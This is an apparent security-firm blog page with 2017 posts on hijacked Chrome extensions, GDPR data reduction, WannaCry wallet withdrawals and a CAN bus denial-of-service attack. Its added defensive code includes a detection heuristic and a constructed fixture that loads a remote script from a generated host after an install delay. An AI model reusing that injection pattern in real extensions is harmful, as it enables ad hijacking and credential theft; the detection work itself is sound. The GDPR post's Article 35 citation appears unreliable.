Wednesday, 13 September 2017

Cyber Criminals Hijack Chrome Extensions and Put 4.7 Million Users at Risk

Developer Accounts of Popular Chrome Extensions Being Hijacked by Cyber Criminals, over 4.7 Million Users Are at a Risk of Cyber Attack

By Stuart Peck, Head of Cyber Security Strategy and Contributor on SecurityAffairs.co

Over 4.7 million users could be at risk of exposure to malicious adverts and credential theft after the developer accounts of several popular Chrome extensions were hijacked by cyber criminals.

A phishing campaign run by cyber criminals in July, which targeted Chrome extension developers in order to harvest their Google account credentials, has led to 8 very popular Chrome extensions being compromised.

“At the end of July and beginning of August, several Chrome Extensions were compromised after their author’s Google Account credentials were stolen via a phishing scheme. This resulted in hijacking of traffic and exposing users to potentially malicious popups and credential theft.” reported the analysis of the security firm Proofpoint.

Figure 1 – Example of the phishing email (source: Proofpoint)

Using the compromised developer accounts, the threat actors were able to inject code into the legitimate extensions that served their users substituted adverts for adult websites and Windows repair scams, and in some cases harvested credentials. Research conducted by Proofpoint reported that the affected extensions include:
  • Web Developer - 1,044,016 users
  • Chrometana - 597,577 users
  • Infinity New Tab - 476,803 users
  • CopyFish - 37,397 users
  • Web Paint - 53,930 users
  • Social Fixer - 182,083 users
  • TouchVPN - 1,031,690 users
  • Betternet VPN - 1,334,517 users
One of the tactics used by the threat actors was to check whether the Chrome extension had been installed for at least 10 minutes before doing anything, a delay commonly thought to bypass detection:

if ((Date.now() - installed) > 10 * 60 * 1000)

Only once this check passed did the rest of the injected code run. It retrieved a remote file, “ga.js”, from a server whose domain was generated by a DGA (Domain Generation Algorithm); the request was made over HTTPS.
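As an added example (not code from Proofpoint or from any of the affected extensions), the following review-time heuristic scan flags the two traits described above in an extension's source: an install-age delay before acting, and a remote script loaded from a hostname assembled at run time. The heuristic names, both fixtures and the genHost() call are constructed for the demo.

```javascript
// Added example (not Proofpoint's or the extensions' own code): a review-time
// heuristic scan of extension JavaScript for two traits described above, an
// install-age delay before acting and a remote script loaded from a hostname
// assembled at run time. The fixtures below are constructed, not real code.
const HEURISTICS = [
  {
    name: "install-age delay",
    // matches e.g. (Date.now() - installed) > 10 * 60 * 1000
    re: /Date\.now\(\)\s*-\s*[\w.]+\s*\)?\s*>\s*\d+\s*\*\s*60\s*\*\s*1000/,
  },
  {
    name: "remote script injection",
    re: /createElement\(\s*["']script["']\s*\)/,
  },
  {
    name: "computed hostname",
    // a URL literal whose host is completed by a function call
    re: /["'`]https?:\/\/["'`]\s*\+\s*[\w$.]+\s*\(/,
  },
];

// Names of the heuristics matched by the given source text, in table order.
function scanExtensionSource(source) {
  return HEURISTICS.filter((h) => h.re.test(source)).map((h) => h.name);
}

// Triage rule: one trait is common in benign code, two or more earn a manual review.
function isSuspicious(source) {
  return scanExtensionSource(source).length >= 2;
}

// Constructed benign fixture: records install time, loads a bundled script.
const BENIGN_SRC = `
  chrome.runtime.onInstalled.addListener(() => {
    chrome.storage.local.set({ installed: Date.now() });
  });
  const s = document.createElement("script");
  s.src = chrome.runtime.getURL("vendor/lib.js");
`;

// Constructed fixture mirroring the behaviour Proofpoint describes (skeleton only).
const SUSPICIOUS_SRC = `
  if ((Date.now() - installed) > 10 * 60 * 1000) {
    const s = document.createElement("script");
    s.src = "https://" + genHost(new Date()) + "/ga.js";
    document.head.appendChild(s);
  }
`;
```

Run over a real extension, the scan is a triage aid for a human reviewer, not a verdict: a bundled script loader alone trips one heuristic, as the benign fixture shows.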

One of the objectives of the compromised version of the extension was to substitute legitimate adverts in the victim’s browser, hijacking traffic from legitimate advertising networks and replacing it with adverts for services (usually adult in nature) from which the threat actors would profit.

“While the attackers substituted ads on a wide range of websites, they devoted most of their energy to carefully crafted substitutions on adult websites” continues Proofpoint.

The substitution targeted a specific set of 33 banner sizes, shown in the code snippet from 973820_BNX.js?rev=133 below:

Figure 2 – Banner sizes for the substituted malicious adverts (source: Proofpoint)

Proofpoint’s research also noted that the pop-up alerts seen in this campaign were similar to those associated with the compromise of the Infinity New Tab extension in May and with the fake EU cookie-consent alerts seen last year.

In summary, attackers are increasingly targeting developers through phishing emails as a way to gain access to a large user base, either to quickly generate traffic for their affiliate schemes or to gather credentials that can later be harvested for profit.

This is a worrying trend, and developers need to be more aware of the increased risk: it was only 6 months ago that researchers discovered attackers targeting the developers of Github repositories to gain access to fintech and high-tech companies.

The tactics on display in this particular campaign are not necessarily new, but they demonstrate the potentially widespread impact of a phishing email. A question that has not really been answered is why the developers did not have 2FA enabled on their Google developer accounts.

Databergs…Are You On Course for a Titanic Sinking?

By Will Lambert, Pre/Post Sales Cyber Security Consultant, ZeroDayLab Limited

As you power through the globe’s business oceans, navigating seas of regulatory and legal compliance, are you on course for a business-sinking crash with a databerg? The captain of your ship probably knows databergs are there, but are you adequately prepared to hinder or reduce the damage a databerg could inflict?

This is not going to be another blog post about EU GDPR, but it is on the horizon and it would therefore be irrational for me not to mention it. Under EU GDPR, Article 35 states that you must not hold excessive amounts of data. Be aware that, even if you deal mainly with the UK, this is likely to remain UK law long after Britain sets sail from the EU in March 2019. As Elizabeth Denham, UK Information Commissioner at the ICO in Cheshire, put it:

“The big question is what happens when the UK leaves the EU. The legal relationship answers are for government to give – I’m a regulator, independent of government - but they’ve made it clear that EU law will remain UK law, until the Government sees fit to repeal it.”

This is not just about EU GDPR any more; look past March 2019. Steps need to be taken as soon as possible to chip away at your databerg until it is a more manageable size, preferably one that avoids fines, or at least reduces them.

What is Your Databerg?
When discussing data, there are mainly three types: Structured, Unstructured and Semi-Structured. Simply put, Structured data is easily searched by relational databases and can be indexed and investigated using search strings. Overall, structured data is something machines can easily understand. Unstructured is almost everything else. Think of unstructured data as data that is written, or presented, for humans to understand easily. Muddying the waters a little, Semi-Structured data consists of Unstructured documents that allow indexing and investigation by search strings, usually by adding tags. This tagging element (usually metadata) allows specific elements of the data to be addressed and located using search strings. Common metadata includes Name, Date Created or Owner.

85% of Your Data is of No Use To Your Organisation
The reality is that only a small proportion of data is readily seen or used by organisations. In fact, the Veritas Databerg Survey 2016 states that a huge 85% of stored data is Dark, Redundant, Obsolete or Trivial! 85% of your data is essentially of no use to your organisation. A huge proportion of your data is potentially being stored and maintained for no business gain and, if it’s not removed, it could tear a hole in your hull and let a flood of fines sink your business.

I can almost hear you shouting at me, “but we have to keep certain data!”. Yes, that’s true. You do have certain regulatory and legal requirements for keeping data, but without performing detailed and meticulous data analytics and discovery, how do you know what you need to keep and what can be, or needs to be, removed? Therefore, it is important to locate Dark, Redundant, Obsolete and Trivial (ROT) data.

The Value of Dark Data is Unknown to Your Organisation
Dark data is data you do not even know exists, and therefore neither a quantitative nor a qualitative value can be attributed to it. It is also data you do know is there but are unsure what it is. The tradition has been to ‘keep it, just in case’ for data where you are unable to identify the person or responsible role for the data. However, this reasoning is unlikely to be accepted under EU GDPR.

How Much Duplicated Data Exists?

Redundant data means asking what level of duplication exists. Do you really need to keep file X five times? Furthermore, what backups have been carried out on the system and what level of duplication exists within those backups? Many businesses are backing up the same area or files more than is necessary.

What is Past its Use-By Date?
Obsolete data involves analysing its ageing characteristics. If a file was created in 2005 and not modified since 2009, does it still need to be kept? Be aware that this range of “obsolete” files would require consultation with Legal before their removal, to keep in line with regulatory and legal requirements.

Trivial or Vital?
You should have a good idea of what file extensions should make up your databerg and what is classed as ‘trivial’ and unimportant.  If your business produces mainly documents, you could argue that picture files are required but what about film and audio files? If they are not important, chip these file types off your databerg!

Where do You Start the Journey?
A decent data discovery exercise will not only show you what data you have and where it is, but will also look at ageing statistics showing how much data you have presently and how much you had in the past. From those statistics, you can project your organisation’s future databerg if nothing is done. I’m sure you will agree that this level of analytics will come in extremely handy when writing business cases for the tools needed to scale and hack away at your company’s databerg.

Reduction is not just about compliance with EU GDPR; it also affects budgets. Certain expenditures will always be associated with data. Power and storage costs are just the start. Storage is becoming cheaper by the day, but why pay for X when you only need half the amount?

Plus, if the 85% figure is to be believed, well, those are fractions I can’t do, but we can agree that it is a massive saving. What if your organisation makes use of Infrastructure as a Service (IaaS) cloud storage solutions? Cloud providers tend to charge between $26 and $155 pcm per user for 1TB of storage. Reduce this to 100GB and the charge drops to between $4 and $33 pcm. Again, it’s quite the saving. (All prices compared at cloudorado.com.)

Identifying the content of your databerg is the first step and must be completed before grabbing crampons and ice axes to begin ploughing through the data. Remember, if you find yourself in the unfortunate position of being breached, having carried out data discovery and taken steps to reduce your databerg can only ever be looked upon favourably by any governing body. The moral of the story is: switch on the radar and identify the size of the risk. While it’s a long, arduous and monotonous journey, it’s better to reduce the databerg than to let your organisation be the next Titanic sinking.

Tuesday, 5 September 2017

WannaCry Authors Withdraw $143,000 from Bitcoin Wallets While World is Distracted!

Wannacry Authors Make a $143,000 Withdrawal from Bitcoin Wallets, Whilst the Internet is Distracted!

By Stuart Peck, Head of Cyber Security Strategy, ZeroDayLab & Contributor to SecurityAffairs.co
Previously published - 5th August 2017

On Wednesday some very interesting and seemingly unrelated events happened in regards to Wannacry. First, Marcus Hutchins (AKA @Malwaretech), the security researcher who discovered the kill switch and stopped the spread of Wannacry, was arrested whilst returning to the UK from Las Vegas, on suspicion of creating malware (covered here).

But the second event, which will be covered in this article, seems to have passed most of Twitter and the internet by. The WannaCry wallets belonging to the orchestrators of the ransomware outbreak (which famously affected companies globally, including the NHS) were emptied to the tune of $143,000. Interestingly, the Bitcoin generated through ransom payments from the global attack had not been touched until Wednesday.

A Twitter bot created by Quartz to monitor the wallets for payments during the original outbreak first noticed the activity at 11:10pm ET. According to the Twitter account, a total of $70,000 was withdrawn in the following three transactions:

7.34128314 BTC ($20,055.52 USD) has just been withdrawn from a bitcoin wallet tied to #wcry ransomware. https://t.co/wX2k9pJLNQ
— actual ransom (@actual_ransom) August 3, 2017

8.73261636 BTC ($23,856.48 USD) has just been withdrawn from a bitcoin wallet tied to #wcry ransomware. https://t.co/KRxgNpBGgz
— actual ransom (@actual_ransom) August 3, 2017

9.67641378 BTC ($26,434.83 USD) has just been withdrawn from a bitcoin wallet tied to #wcry ransomware. https://t.co/CJLiu6cyvr
— actual ransom (@actual_ransom) August 3, 2017

Source: QZ.com

The Twitter bot then reported, only 15 minutes later, that the remainder of the funds had been moved from the Bitcoin wallets. It is highly likely that these were laundered using a mixing service, which makes it very hard to track the source and destination of the payments by splitting them into a high volume of small transactions to a large number of wallets.

Given that the orchestrators of the Wannacry outbreak are widely suspected to be the Lazarus Group, which has connections to North Korea, the timing and motivation of the BTC exfiltration could be a dig at Marcus Hutchins, who stopped the spread of the attack, or just a coincidence; at this juncture there is no evidence to call it either way.

But it is also known that Lazarus, and Bluenoroff in particular, are financially motivated, with attacks on banks, financial and trading companies in Bangladesh in 2014 and the now famous $81 million cyber-heist of the Bangladesh central bank’s account at the Federal Reserve Bank of New York.

In summary, although the attackers behind Wannacry and NotPetya are thought by many not to be financially motivated, it seems that even they could not resist the opportunity to silently move their ill-gotten gains whilst the internet was distracted by other events!

Wednesday, 30 August 2017

ICS-CERT Issues Warning of CAN Bus Vulnerability

The US ICS-CERT issued an alert in response to a public report of a vulnerability in the Controller Area Network bus (CAN bus).

By Stuart Peck, Head of Cyber Security Strategy, ZeroDayLab
On Friday (28th of July), the Industrial Control Systems Cyber Emergency Response Team, or ICS-CERT, issued an alert in response to a public report of a vulnerability in the Controller Area Network (CAN) bus standard.

The vulnerability detailed in the alert is a stealthy denial-of-service attack that requires physical access to the CAN bus and an attacker with extensive knowledge of how to reverse engineer the traffic. It ultimately results in the disruption of the availability of arbitrary functions of the target device.

The public report referenced in the ICS-CERT alert comes from a group of Italian security researchers at Politecnico di Milano (the largest technical university in Italy). In their report the researchers detail how “modern vehicles incorporate tens of electrical control units (ECUs), driven by, according to estimates, as much as 100,000,000 lines of code. They are tightly interconnected via internal networks, mostly based upon the CAN bus standard…”.

The report presents how this denial-of-service attack against the CAN bus standard is harder to detect, because it exploits the design of the CAN protocol at a low level. This allows an attacker to cause malfunctions in safety-critical components or to disable vehicle functions such as power steering or airbags.

The attack exploits a weakness in the CAN protocol itself, working between the physical and data link layers of the OSI stack without requiring the attacker to have any message-sending capability.

It is important to note that the research concluded that this attack is completely undiscoverable without a major restructure of CAN bus networks, which are widely adopted in automotive, manufacturing, building automation and hospital environments.

A full proof of concept of the CAN denial-of-service was posted on Github. The project, titled “A Stealth, Selective, Link-layer Denial-of-Service Attack Against Automotive Networks”, proves the attack detailed in the paper released by Politecnico di Milano. The attack was delivered against an Alfa Romeo Giulietta using an Arduino Uno Rev 3 to disable the parking sensor module (identifier 06314018) on CAN B, which uses 29-bit identifiers at 50 kbps.

In summary, this attack manipulates individual recessive and dominant bits to cause malfunctions in CAN nodes, rather than injecting complete frames as previously reported attacks did; those frame-level attacks can be detected by IDS/IPS systems, unlike this one.
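Because the attack leaves no malicious frame on the bus for an IDS to match, what a passive tap can still observe is its effect: the targeted ECU's periodic frames stop arriving. The following liveness monitor for one identifier is an added example, not code from the ICS-CERT alert or the Politecnico di Milano project; the 100 ms period, the miss limit and the trace are assumed or constructed, while the identifier is the one the post names.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Added example, not code from the ICS-CERT alert or the Politecnico paper.
 * The bit-level DoS leaves no malicious frame to inspect; what a passive tap
 * can still observe is that the victim ECU's periodic frames stop arriving.
 * This monitor tracks the liveness of one identifier. The 100 ms period and
 * the miss limit are assumed values; the identifier is the one in the post. */
#define MON_ID     0x06314018u  /* 29-bit extended ID of the parking sensor module */
#define PERIOD_MS  100u         /* assumed nominal transmit period */
#define MISS_LIMIT 3u           /* consecutive missed periods before alarming */

struct can_sample { uint32_t ts_ms; uint32_t id; };  /* timestamped frame seen on the tap */
struct liveness   { uint32_t last_seen_ms; bool seen_once; bool alarm; };

static void liveness_init(struct liveness *m) {
    m->last_seen_ms = 0; m->seen_once = false; m->alarm = false;
}

/* Record a frame if it carries the monitored identifier. */
static void liveness_observe(struct liveness *m, const struct can_sample *f) {
    if (f->id == MON_ID) { m->last_seen_ms = f->ts_ms; m->seen_once = true; }
}

/* Check for silence at time now_ms; once raised, the alarm stays latched. */
static bool liveness_check(struct liveness *m, uint32_t now_ms) {
    if (m->seen_once && now_ms - m->last_seen_ms > MISS_LIMIT * PERIOD_MS)
        m->alarm = true;
    return m->alarm;
}

/* Replay a trace; return the timestamp at which the alarm first fires, 0 if never. */
uint32_t first_alarm_ms(const struct can_sample *trace, size_t n) {
    struct liveness m;
    liveness_init(&m);
    for (size_t i = 0; i < n; i++) {
        liveness_observe(&m, &trace[i]);
        if (liveness_check(&m, trace[i].ts_ms)) return trace[i].ts_ms;
    }
    return 0;
}

/* Constructed trace (not a real capture): the sensor sends every 100 ms, then
 * falls silent while another ECU (ID 0x1A0) keeps the bus busy. */
const struct can_sample dos_trace[] = {
    {100, MON_ID}, {150, 0x1A0u}, {200, MON_ID}, {250, 0x1A0u}, {300, MON_ID},
    {350, 0x1A0u}, {450, 0x1A0u}, {550, 0x1A0u}, {650, 0x1A0u}, {750, 0x1A0u},
};
const size_t dos_trace_len = sizeof dos_trace / sizeof dos_trace[0];
```

The monitor detects the symptom (a silent ECU), not the bit-level manipulation itself, so it also fires on a genuine hardware fault; in a gateway it would be driven by a timer tick rather than only by other nodes' frames.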

Because of how the denial-of-service attack exploits the design of the CAN protocol, and how easily an input port (typically OBD-II) can be accessed by a potential attacker, the recommendation from ICS-CERT is to limit access to these input ports. ICS-CERT is also working with the automotive industry and other industries to strategize mitigation plans.

Finally, given how widely the CAN bus is adopted by the automotive, healthcare and manufacturing industries, this further highlights how a single weakness in a secure environment can compromise the network as a whole.